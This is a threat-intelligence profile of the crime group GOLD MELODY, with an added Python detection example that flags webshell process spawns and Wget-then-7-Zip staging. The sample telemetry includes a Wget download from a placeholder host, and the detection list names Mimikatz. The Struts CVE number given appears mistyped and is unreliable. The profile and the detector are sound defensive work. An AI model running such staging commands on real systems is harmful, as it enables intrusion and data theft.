GOLD MELODY
SUMMARY
GOLD MELODY is a financially motivated crime group that has been active since at least 2017. It favors scanning internet-facing servers to identify and exploit vulnerabilities to opportunistically compromise networks.
CTU researchers have observed the group exploiting vulnerabilities in Oracle WebLogic (CVE-2016-0545), Flexera FlexNet (CVE-2021-4104), and Sitecore (CVE-2021-42237) servers, as well as the Apache Struts vulnerability CVE-2017-56383.
The group deploys Java Server Pages (JSP) webshells to maintain persistence on a compromised network. It conducts reconnaissance using built-in operating system commands and harvests credentials with the Mimikatz tool. GOLD MELODY uses the free Wget download utility to fetch the 7-Zip archiving tool, which it uses for defense evasion and for packaging data for exfiltration. AUDITUNNEL, a reverse proxy tunnelling tool that supports SOCKS5 proxy connections, is used for remote code execution. GOLD MELODY has also been observed using the GOTROJ remote access trojan (RAT).
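The tradecraft above (a JSP webshell hosted by the Java application server, Wget staging 7-Zip, 7-Zip archiving data) leaves a recognisable process-creation pattern. The following is an added detection example, not code from the CTU profile; the event layout, host names, image names and the download URL are constructed assumptions.

```python
"""Added example (not from the profile): flag process-creation events that match
the GOLD MELODY pattern - a Java web/app server (the JSP webshell's host process)
spawning a shell, Wget or 7-Zip, and Wget being followed by 7-Zip on the same host.
Event fields, hosts and command lines below are constructed for illustration."""

# Parent images that typically host JSP webshells (WebLogic, Tomcat run as java).
WEB_PARENTS = {"java.exe", "java"}
# Children an application server has no legitimate reason to launch (assumed names).
SUSPICIOUS_CHILDREN = {"cmd.exe", "powershell.exe", "wget.exe", "7z.exe",
                       "7za.exe", "mimikatz.exe", "whoami.exe", "net.exe"}
ARCHIVERS = {"7z.exe", "7za.exe"}


def find_webshell_spawns(events):
    """Return events where a Java application server spawns a suspicious child."""
    return [e for e in events
            if e["parent"].lower() in WEB_PARENTS
            and e["image"].lower() in SUSPICIOUS_CHILDREN]


def find_wget_then_7zip(events):
    """Return hosts where Wget ran and 7-Zip was launched afterwards
    (tool staging followed by archiving, as described in the profile)."""
    wget_seen = {}  # host -> timestamp of first Wget execution
    hits = set()
    for e in sorted(events, key=lambda ev: ev["ts"]):
        img = e["image"].lower()
        if img == "wget.exe":
            wget_seen.setdefault(e["host"], e["ts"])
        elif img in ARCHIVERS and e["host"] in wget_seen:
            hits.add(e["host"])
    return sorted(hits)


# Constructed sample telemetry; hosts, paths and URL are placeholders.
SAMPLE_EVENTS = [
    {"ts": 1, "host": "web01", "parent": "java.exe", "image": "cmd.exe",
     "cmdline": "cmd.exe /c whoami"},
    {"ts": 2, "host": "web01", "parent": "cmd.exe", "image": "wget.exe",
     "cmdline": "wget.exe http://PLACEHOLDER-HOST/7za.exe"},
    {"ts": 3, "host": "web01", "parent": "cmd.exe", "image": "7za.exe",
     "cmdline": "7za.exe a staged.7z C:\\data"},
    {"ts": 4, "host": "web02", "parent": "explorer.exe", "image": "7z.exe",
     "cmdline": "7z.exe x backup.7z"},  # benign: no preceding Wget, not from java
    {"ts": 5, "host": "web02", "parent": "java.exe", "image": "javaw.exe",
     "cmdline": "javaw.exe -jar app.jar"},  # benign: expected child of java
]

if __name__ == "__main__":
    print(find_webshell_spawns(SAMPLE_EVENTS))  # the ts=1 cmd.exe spawn
    print(find_wget_then_7zip(SAMPLE_EVENTS))   # ['web01']
```

Tuning note: allow-list the children your own servers legitimately spawn (for example a service wrapper) before deploying a rule like this, since `java.exe` spawning `cmd.exe` is rare but not unknown in build and deployment tooling.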
CTU researchers assess with moderate confidence that GOLD MELODY operates as an initial access broker (IAB), first compromising networks and then selling access to other cybercriminal groups.